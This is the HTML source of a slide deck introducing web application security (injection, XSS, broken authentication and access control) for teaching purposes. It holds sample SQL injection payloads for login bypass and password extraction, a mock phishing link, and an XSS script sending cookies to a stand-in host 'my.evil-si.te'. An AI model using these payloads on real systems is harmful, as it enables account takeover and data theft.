<!doctype html>
<html lang="en">

	<head>
		<meta charset="utf-8">

		<title>Web Application Security in a nutshell</title>

		<meta name="description" content="An ultra-compact intro to Web Application Security">
		<meta name="author" content="Bjoern Kimminich">

		<meta name="apple-mobile-web-app-capable" content="yes" />
		<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />

		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

		<link rel="stylesheet" href="css/reveal.min.css">
		<link rel="stylesheet" href="css/theme/default.css" id="theme">
        <link rel="stylesheet" href="css/custom.css">

		<!-- For syntax highlighting -->
		<link rel="stylesheet" href="lib/css/zenburn.css">

		<!-- If the query includes 'print-pdf', include the PDF print sheet -->
		<script>
			if( window.location.search.match( /print-pdf/gi ) ) {
				var link = document.createElement( 'link' );
				link.rel = 'stylesheet';
				link.type = 'text/css';
				link.href = 'css/print/pdf.css';
				document.getElementsByTagName( 'head' )[0].appendChild( link );
			}
		</script>

		<!--[if lt IE 9]>
		<script src="lib/js/html5shiv.js"></script>
		<![endif]-->
	</head>

	<body>

		<div class="reveal">

			<!-- Any section element inside of this container is displayed as a slide -->
			<div class="slides">
                <section>
                    <h1>Web Application Security</h1>
                    <h3>in a 🌰shell</h3>
                    <h5>An ultra-compact intro</h5>
                    <p>
                        <small>Copyright (c) <a href="https://www.linkedin.com/in/bkimminich/">Björn Kimminich</a> / <a href="http://twitter.com/bkimminich">@bkimminich</a></small>
                    </p>
                </section>
                <section>
                    <h2>Björn Kimminich</h2>
                    <ul>
                        <li>IT Architect / AppSec Officer at <a href="http://kuehne-nagel.com">Kuehne + Nagel</a></li>
                        <li>Volunteer in the <a href="https://owasp.org">Open Web Application Security Project</a></li>
                        <li>Board Member of the <a href="https://www.owasp.org/index.php/Germany">German OWASP Chapter</a></li>
                        <li>Project Lead of the <a href="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project">OWASP Juice Shop</a></li>
                    </ul>
                </section>

				<section>
                    <h2>🤐 Famous last words...</h2>
                    <blockquote class="fragment">
                        &ldquo;Nobody would bother to hack us.&rdquo;
                    </blockquote>
                    <blockquote class="fragment">
                        &ldquo;Our network firewall will keep us safe.&rdquo;
                    </blockquote>
                    <blockquote class="fragment">
                        &ldquo;We have tests for all our use cases.&rdquo;
                    </blockquote>
                    <blockquote class="fragment">
                        &ldquo;We will add security to the system later.&rdquo;
                    </blockquote>
                    <blockquote class="fragment">
                        &ldquo;What's the worst that could happen?&rdquo;
                    </blockquote>
                </section>

                <section>
                    <h2>🤔 What is a Vulnerability?</h2>
                    <blockquote class="fragment" cite="https://en.wikipedia.org/wiki/Vulnerability_(computing)#Definitions">
                        A flaw or weakness in system security procedures, design, implementation, or internal controls that could […]
                        result in a security breach or a violation of the system's security policy.
                    </blockquote>
                </section>

                <section>
                    <h2>🤔 What is an Exploit?</h2>
                    <blockquote class="fragment" cite="https://en.wikipedia.org/wiki/Exploit_(computer_security) ">
                        A piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or
                        vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware,
                        or something electronic (usually computerized).
                    </blockquote>
                </section>

                <section>
                    <h2>🤔 Who are the Attackers?</h2>
                    <ul>
                        <li class="fragment">👶 Script Kiddies</li>
                        <li class="fragment">🌱 Hacktivists</li>
                        <li class="fragment">💰 Organized Crime</li>
                        <li class="fragment">👛 Corrupt / 😡 Disgruntled Employees</li>
                        <li class="fragment">🏭 Competitors</li>
                        <li class="fragment">🦅 Nation States</li>
                    </ul>
                </section>

                <section>
                    <h2>💉 Injection</h2>
                </section>
                <section>
                    <h3>👨‍⚖️ Injection Explained</h3>
                    <small>
                        Smuggling in <em class="fragment highlight-red" data-fragment-index="1">unintended commands</em> along with <span class="fragment highlight-blue" data-fragment-index="0">the data</span> sent to <em class="fragment highlight-green" data-fragment-index="3">an interpreter</em>.
                    </small>
                    <blockquote cite="https://news.ycombinator.com/item?id=4951003" class="fragment" data-fragment-index="0">
                        You go to court and write your name as "<strong><span style="color: #1B91FF;">Michael</span><span class="fragment" style="color: #FF2C2D" data-fragment-index="1">, you are now free to go</span></strong>".
                    </blockquote>
                    <blockquote class="fragment" data-fragment-index="2">
                        The judge then says "Calling <strong><span style="color: #1B91FF;">Michael</span><span style="color: #FF2C2D;">, you are now free to go</span></strong>" <span class="fragment" data-fragment-index="3">and the bailiffs let you go,
                        because hey, <span style="color: #17FF2E;">the judge</span> said so.</span>
                    </blockquote>
                </section>
                <section>
                    <h3>💻 In software, interpreters are used for accessing...</h3>
                    <ul>
                        <li>Databases (SQL, HQL, ...)</li>
                        <li>Files (OS Shell, XPath, ...)</li>
                        <li>Access Control Systems (LDAP, ...)</li>
                        <li>...</li>
                    </ul>
                </section>
                <section>
                    <h3>🚨 Risks from Injection vulnerabilities</h3>
                    <ul>
                        <li>Bypassing authentication</li>
                        <li>Spying out data</li>
                        <li>Manipulating data</li>
                        <li>Complete system takeover</li>
                    </ul>
                </section>
                <section>
                    <section>
                        <h3>🔓 SQLI Authentication Bypass</h3>
                        <pre><code class="java" data-trim>
String query = "SELECT id FROM users " +
           "WHERE name = '" + req.getParameter("username") + "'" +
           "AND password = '" + req.getParameter("password") + "'";
                        </code></pre>
                        <p>Generates queries like this:</p>
                        <pre><code class="sql" data-trim contenteditable>
SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
                        </code></pre>
                    </section>
                    <section>
                        <h3>🗡️ Attack Examples</h3>
                        <p>Disabling password check for a known username:</p>
                        <pre><code class="sql" data-trim contenteditable>
SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
                        </code></pre>
                        <p>Logging in without even knowing a username:</p>
                        <pre><code class="sql" data-trim contenteditable>
SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
                        </code></pre>
                    </section>
                </section>
                <section>
                <section>
                    <h3>🔭 Spying out Data with SQLI</h3>
                    <pre><code class="java" data-trim>
String query =
        "SELECT * FROM books " +
        "WHERE title LIKE '%" + req.getParameter("query") + "%'";
                    </code></pre>
                    <p>Generates queries like this:</p>
                    <pre><code class="sql" data-trim contenteditable>
SELECT * FROM books WHERE title LIKE '%tangled web%'
                    </code></pre>
                </section>
                    <section>
                        <h3>🗡️ Attack Examples</h3>
                        <small>❌ This will <strong>not</strong> work unless both result sets coincidentally have an equal number of columns:</small>
                        <pre><code class="sql" data-trim>
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT * FROM users--%'
                        </code></pre>
                        <p>
                            <span class="fragment" data-fragment-index="1">❌</span>
                            <span class="fragment" data-fragment-index="2">❌</span>
                            <span class="fragment" data-fragment-index="3">✅</span>
                            <span class="fragment" data-fragment-index="1">Probing for right number of result set columns:</span>
                        </p>
                        <pre class="fragment" data-fragment-index="1"><code class="sql" data-trim>
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1 FROM users--%'
                        </code></pre>
                        <pre class="fragment" data-fragment-index="2"><code class="sql" data-trim>
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1,2 FROM users--%'
                        </code></pre>
                        <pre class="fragment" data-fragment-index="3"><code class="sql" data-trim>
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1,2,3 FROM users--%'
                        </code></pre>
                        <div class="fragment">
                            <p>Using known/guessed column names to extract data:</p>
                            <pre><code class="sql" data-trim>
SELECT * FROM books WHERE title LIKE '%'
UNION SELECT name,email,password FROM users--%'
                            </code></pre>
                        </div>
                    </section>
                </section>

                <section>
                    <section>
                        <h1>🎦 Demo</h1>
                    </section>
                    <section>
                        <h3>🛡️ Protection against Injection</h3>
                        <ul>
                            <li>Avoid Interpreters</li>
                            <li>Bind Variables</li>
                            <li>Prepared Statements</li>
                            <li>Least Privileges for app DB user</li>
                            <li>White List Input Validation</li>
                        </ul>
                    </section>
                </section>

                <section>
                    <h2>📜 Cross Site Scripting (XSS)</h2>
                </section>
                <section>
                    <h3>💀 Malicious Code is sent...</h3>
                    <small>
                        ...to an innocent user's browser through, e.g. a link in a phishing email like the following:
                    </small>
                    <blockquote><small>
                        Dear valued customer,
                        <br><br>
                        you might be intrerestred in our new special offer! We offer
                        best quailty on the planet for the lowest price possible: <a target="_blank" href="http://localhost:3000/#/search?q=%3Chr%3E%3Ch1%3ESorry,%20we%20went%20out%20of%20business!%3C%2Fh1%3E%3Cimg%20src%3D%22http:%2F%2Fwebappsec-nutshell.kimminich.de%2Fassets%2Fumwelt-gift-warnung.png%22%3E%3Chr%3E~~~~~~~~~~Click%20%3Ca%20href%3D%22http:%2F%2Fwww.ebay.com%2Fsch%2Fi.html%3F_sacat%3D0%26_nkw%3Dkuehne%2Bnagel%26_frs%3D1%22%3E*****here*****%3C%2Fa%3E%20to%20buy%20quality%20wares%20instead!~~~~~~~~~~">Click here for special offer!</a>
                        <br><br>
                        Bjorn (Chief Executive Officer)
                    </small></blockquote>
                </section>
                <section>
                    <h3>🚒 Possible Damage from XSS</h3>
                    <ul>
                        <li>rewriting web page</li>
                        <li>redirecting to malicious site</li>
                        <li>stolen user session</li>
                        <li>stolen sensitive data</li>
                    </ul>
                </section>
                <section>
                    <h3>📜 XSS Vulnerability Example</h3>
                    <pre><code class="command" data-trim contenteditable>
http://bookwo.rm/titles/search?keywords=raspberry%20pi
                    </code></pre>
                    <p>Often the search terms are displayed above the results:</p>
                    <pre><code class="java" data-trim contenteditable>
<%
String keywords = request.getParameter("keywords");
List&lt;Book&gt; results = titleSearchService.search(keywords.split(" "));
%>
There are <%=results.count()%> results for
your search terms &lt;em&gt;<%=keywords%>&lt;/em&gt;
&lt;table&gt;
<% for (Book book : results) { %>
  // render result as table rows
<% } %>
&lt;/table&gt;
                    </code></pre>
                </section>
                <section>
                    <h3>🗡️ Attack Examples</h3>
                    <p>Probing for XSS Vulnerability</p>
                    <pre><code class="command" data-trim contenteditable>
&lt;script&gt;alert(1)&lt;/script&gt;
                    </code></pre>
                    <p>Stealing User Session</p>
                    <pre><code class="command" data-trim contenteditable>
&lt;script&gt;
  new Image().src="http://my.evil-si.te/hijack.php?c="
                        +encodeURI(document.cookie);
&lt;/script&gt;
                    </code></pre>
                    <p>Site Defacement</p>
                    <pre><code class="command" data-trim contenteditable>
&lt;script&gt;
  document.body.background="http://my.evil-si.te/image.jpg";
&lt;/script&gt;
                    </code></pre>
                </section>

                <section>
                    <section>
                        <h1>🎦 Demo</h1>
                    </section>
                    <section>
                        <h3>🛡️ Protection against XSS</h3>
                        <ul>
                            <li>Avoid including user supplied input into output</li>
                            <li>Output encode <strong>all</strong> user supplied input</li>
                            <li>Sanitize HTML where user supplied HTML is unavoidable</li>
                            <li>White List Input Validation</li>
                        </ul>
                    </section>
                </section>

                <section>
                    <h2>🔑 Broken Authentication</h2>
                </section>
                <section>
                    <h3>🤦‍ Typical Authentication Flaws</h3>
                    <ul>
                        <li>Allowing weak passwords</li>
                        <li>Storing sensitive data insecurely</li>
                        <li>Using insecure <code>http</code> connection</li>
                        <li>...</li>
                    </ul>
                </section>
                <section>
                    <h3>🏹 Side Channel Attack Vectors</h3>
                    <ul>
                        <li>Change Password</li>
                        <li>&ldquo;Remember me&rdquo;</li>
                        <li>Forgot Password</li>
                        <li>Secret Questions</li>
                    </ul>
                </section>

                <section>
                    <section>
                        <h1>🎦 Demo</h1>
                    </section>
                    <section>
                        <h3>🛡️ Securing Authentication</h3>
                        <ul>
                            <li>Centralized and standardize authentication</li>
                            <li>Protect credentials with SSL/TLS<small>1</small></li>
                            <li>Use strong mechanism with multiple factors</li>
                            <li>Do not store or log unencrypted credentials<small>2</small></li>
                        </ul>
                        <hr>
                        <p>
                            <small>
                                <small>1</small>Serve a <a href="https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security">HSTS header</a> from your site to protect against protocol downgrade attacks. Also consider applying to have your domain included in the <a href="https://hstspreload.org">HSTS preload list</a> of Chromium.
                            </small>
                        </p>
                        <p>
                            <small>
                                <small>2</small> Best avoid to store credentials at all. If you must, use only brute-force resistant algorithms for password hashing, preferrably <a href="https://github.com/P-H-C/phc-winner-argon2">Argon2</a> the winner of the <a href="https://password-hashing.net/">Password Hashing Competition</a>.
                            </small>
                        </p>
                    </section>
                </section>

                <section>
                    <h2>🚪 Broken Access Control</h2>
                </section>
                <section>
                    <h3>🔓 Common Authorization Mistakes</h3>
                    <ul>
                        <li>Hiding things w/o restricting access</li>
                        <li>Displaying only authorized links and menu choices</li>
                        <li>Trusting client-side access control mechanisms</li>
                        <li>Lack of server-side verification of user privileges</li>
                    </ul>
                </section>
                <section>
                    <h3>🃏 Request Tampering Examples</h3>
                    <p>How could we escalate our privileges here?</p>
                    <pre><code class="command" data-trim contenteditable>
http://logistics-worldwi.de/showShipment?id=40643108
                        </code></pre>
                    <pre><code class="command" data-trim contenteditable>
http://my-universi.ty/api/students/6503/exams/view
                        </code></pre>
                    <pre><code class="command" data-trim contenteditable>
http://document-warehou.se/landingpage?content=index.html
                        </code></pre>
                </section>

                <section>
                    <section>
                        <h1>🎦 Demo</h1>
                    </section>
                    <section>
                        <h3>🛡️ Securing Access Control</h3>
                        <ul>
                            <li>Never rely on <q>&ldquo;Security by obscurity&rdquo;</q></li>
                            <li>Restrict data and functionality access</li>
                            <li>Enforce user or role based permissions</li>
                        </ul>
                    </section>
                </section>

                <section>
                    <h1>❓ Q&A</h1>
                </section>
                <section>
                    <h2>👏 Credits</h2>
                        <p>Presentation created with <a href="https://github.com/hakimel/reveal.js">reveal.js</a></p><small>The HTML Presentation Framework</small>
                        <p>Based on free material provided by <a href="https://owasp.org">OWASP</a></p><small>The Open Web Application Security Project</small>
                        <p>Background image based on <a href="http://sephiroth-kmfdm.deviantart.com/art/Digital-Shodan-56013493">Digital Shodan</a></p><small>by <a href="http://sephiroth-kmfdm.deviantart.com/">sephiroth-kmfdm</a></small>
                </section>

				<section>
					<h1>The🔚</h1>
                    <p>Copyright (c) <a href="https://www.linkedin.com/in/bkimminich/">Björn Kimminich</a> / <a href="http://twitter.com/bkimminich">@bkimminich</a></p>
                    <p>
                        <small>
                            <a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-nc/4.0/88x31.png" /></a><br />This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">Creative Commons Attribution-NonCommercial 4.0 International License</a>.
                        </small>
                    </p>
				</section>

			</div>

		</div>

		<script src="lib/js/head.min.js"></script>
		<script src="js/reveal.min.js"></script>

		<script>

			// Full list of configuration options available here:
			// https://github.com/hakimel/reveal.js#configuration
			Reveal.initialize({
				controls: true,
				progress: true,
				history: true,
				center: true,

				theme: Reveal.getQueryHash().theme || 'moon', // available themes are in /css/theme
				transition: Reveal.getQueryHash().transition || 'concave', // default/cube/page/concave/zoom/linear/fade/none

				// Parallax scrolling
				parallaxBackgroundImage: 'assets/shodan_dark_blurry.jpg',
				parallaxBackgroundSize: '2300px 1600px',

				// Optional libraries used to extend on reveal.js
				dependencies: [
					{ src: 'lib/js/classList.js', condition: function() { return !document.body.classList; } },
					{ src: 'plugin/markdown/marked.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
					{ src: 'plugin/markdown/markdown.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
					{ src: 'plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } },
					{ src: 'plugin/zoom-js/zoom.js', async: true, condition: function() { return !!document.body.classList; } },
					{ src: 'plugin/notes/notes.js', async: true, condition: function() { return !!document.body.classList; } }
				]
			});

		</script>

        <div class="hidden-mobile">
            <div style="display: block; position: absolute; bottom: 14px; left: 50%; margin-left: -230px; z-index: 20;">
                <a href="https://twitter.com/share" class="twitter-share-button" data-url="http://webappsec-nutshell.kimminich.de" data-text="Web Application Security in a Nutshell - An ultra-compact intro" data-via="bkimminich">Tweet</a>
                <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script>
                <a href="https://twitter.com/bkimminich" class="twitter-follow-button" data-show-count="true">Follow @bkimminich</a>
                <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script>
                <iframe src="https://ghbtns.com/github-btn.html?user=bkimminich&type=follow&count=true" frameborder="0" scrolling="0" width="180px" height="20px"></iframe>
                <iframe src="https://ghbtns.com/github-btn.html?user=bkimminich&repo=webappsec-nutshell&type=star&count=true" frameborder="0" scrolling="0" width="170px" height="20px"></iframe>
            </div>
        </div>

    </body>
</html>
